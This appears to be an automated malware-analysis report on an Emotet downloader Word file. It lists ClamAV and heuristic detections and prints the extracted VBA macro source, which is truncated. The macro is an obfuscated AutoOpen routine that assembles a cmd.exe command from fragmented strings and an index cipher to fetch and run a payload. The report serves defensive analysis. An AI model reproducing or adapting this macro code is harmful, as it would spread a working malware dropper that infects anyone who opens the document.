MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6884099-0. The presence of an AutoOpen VBA macro, detected by multiple heuristics, indicates an attempt to automatically execute malicious code upon opening. The VBA script attempts to construct and execute a command using cmd.exe, likely to download and run a secondary payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6884099-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6884099-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5578 bytes |
SHA-256: 32e49c06190bd4c021f8937768d590e102361374fcf95d44aae4811df071dedd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vAwEVtIbVSrSj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName CLng(irMhWn)
TypeName 338329765
TypeName aYiCM
TypeName 71
TypeName CBool(489)
TypeName MmzEcE
Shell@ CStr("c") + CStr("m") + NdZfvViX + uKofsGwlEwon + MWsbmbqR + znhucOiUT + kCQUKdtB + IbfiCAfuwqT + oPotQiWZjdTJ, 755278706 - 755278706
TypeName Cos(jfTHB - 96777)
TypeName Int(uNzPl)
End Sub
Attribute VB_Name = "vFsjRPNQrNrzD"
Function MWsbmbqR()
On Error Resume Next
TypeName 439636158
TypeName 285005702
cSatoFJq = "d /V/C" + CStr(Chr(NdizaPl + luHIVFzTNF + 34 + MjKTdrkTP + bSCThDWQ)) + "se" + "t" + " C" + "9" + "Ea=KrbJdJP" + "bdjHWnEXP" + "Q" + "OJi" + "KB" + "oPnDJjOIp" + "mG/M$aF v" + "C+S=,{" + ";ew"
TypeName ChrB(383582473)
TypeName Hex(8792)
EEQRNoXkOJS = ".:h" + "9u}" + "Nyfl" + "sq" + "xR5Lc" + "gz" + "1-(t4'V\k)"
TypeName CByte(5)
TypeName 143
cCVNZBTcM = "@&&for %m" + " in (30;2" + "2;48;47;1;" + "5" + "9;51;4" + "7;58;58;38" + ";35;5" + "1;51;60;4" + "3;24;47;" + "48;69" + ";22;7;" + "27;47;65" + ";71;38;55;"
TypeName wpIFpR
TypeName CbjKf
ptFQILNao = "47" + ";71;49" + ";11;47;7;4" + "0;58;19" + ";47;24" + ";71;" + "46;35;3" + "7" + ";22;3" + "6;43;73"
TypeName Chr(245)
TypeName Sgn(7)
dcbMzR = ";51;71;7" + "1;" + "30;5" + "0;" + "33;" + "3" + "3;71;24;5" + "7;1" + "9;"
TypeName ChrB(8316)
TypeName tFWYT
OMDocnwcb = "1;59;71" + ";49;65" + ";2" + "2" + ";" + "3"
TypeName QwqdQn
TypeName 430906566
jwifwAHlQqF = "1;33;" + "30;14;64;7" + "8;51;" + "71" + ";71;3" + "0;50;33;" + "33;" + "7" + "1;51;47" + ";" + "71;1;47" + ";47"
TypeName Log(36468 / uJHbE - qjQrz / OQZNj)
TypeName BMmqE
waGduUCzb = ";31;22;3" + "9;19;4" + "7" + ";49;6" + "5;22;31;33" + ";63;3" + "0;" + "71;" + "48;62;34;7" + "4;"
TypeName CDbl(MASwG * QJjwuU + SjwOt / haDDH)
TypeName Chr(352)
fXQwMfkN = "60;78;51;" + "71;" + "71;30;50;" + "33;33;48;" + "48" + ";48;4" + "9" + ";59;" + "53;24;8;36" + ";56;30"
TypeName 6
TypeName Fix(TCCrp)
TypeName Log(68150 * srHzGq / liBjd - 77025)
hAQDhRXGWcs = ";58;36;24;" + "24;19;" + "2" + "4;66;" + "49;" + "65;22;31;" + "33;22;10;7" + "6;34;78;51" + ";71;7" + "1" + ";30;50;3" + "3;" + "33;71;"
TypeName Sin(1)
TypeName Oct(pIwLiB)
TypeName Log(CQwrc / nzBWC)
zzQuiXw = "47;76;76" + ";5" + "6;49;24" + ";4" + "7;7" + "1;33;66" + ";51;67;5" + "5;28;78;5" + "1;71;71;3" + "0;" + "50;3" + "3;"
TypeName Hex(856)
TypeName Int(oVlDh / TrrnN / 655 / 42173)
TypeName Hex(72852 / 27956 - 81033 + hDZSt)
jVSiZwz = "33;" + "71;4" + "7;65;58" + ";47;48" + ";47;7;49;" + "65;22;31;4" + "9;7;" + "1" + ";3" + "3;57"
TypeName dmFIOt
TypeName Sgn(217608389)
TypeName CInt(pswBr)
ZciRUjDa = ";3" + "2;11;5" + "2;72;22" + ";19" + ";" + "65;73" + ";49" + ";42;30;5" + "8;19;71;70" + ";73;7" + "8;73;77;"
MWsbmbqR = cSatoFJq + EEQRNoXkOJS + cCVNZBTcM + ptFQILNao + dcbMzR + OMDocnwcb + jwifwAHlQqF + waGduUCzb + fXQwMfkN + hAQDhRXGWcs + zzQuiXw + jVSiZwz + ZciRUjDa
TypeName Hex(Zlujmj)
TypeName Fix(EOYRM)
TypeName CStr(14389 / dCPnV)
End Function
Function znhucOiUT()
On Error Resume Next
TypeName Rnd(biwWrW - 81357 * 40956 + 2877)
TypeName CLng(79437 - FiQXwv * 70717 + FHmNNY)
ivULw = "46;35;2" + "1" + ";67;20;3" + "8;43;3" + "8;73" + ";68;63;63"
TypeName Fix(lUGMu)
TypeName mUfut
TypeName Rnd(94)
fFXswVSz = ";73;46;" + "35" + ";62;65;" + "5" + "3;43;" + "35;47;24" + ";39" + ";" + "50;71" + ";47" + ";31;3" + "0;41;73"
TypeName Sin(18)
TypeName Rnd(3285)
TypeName CDate(UGdJon)
WwWhCbp = ";" + "75;73" + ";" + "41;3" + "5;21;" + "67;20;41;7" + "3;" + "49;47" + ";61;47;73;"
TypeName aDJTsw
TypeName 713
TypeName Log(iITGsT / 29262 - JwLniE - biiLV)
iZMdUwiw = "46;57;" + "22;" + "1;47;36" + ";6" + "5;5" + "1;70;35;4" + "2;42;"
TypeName bWNco
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.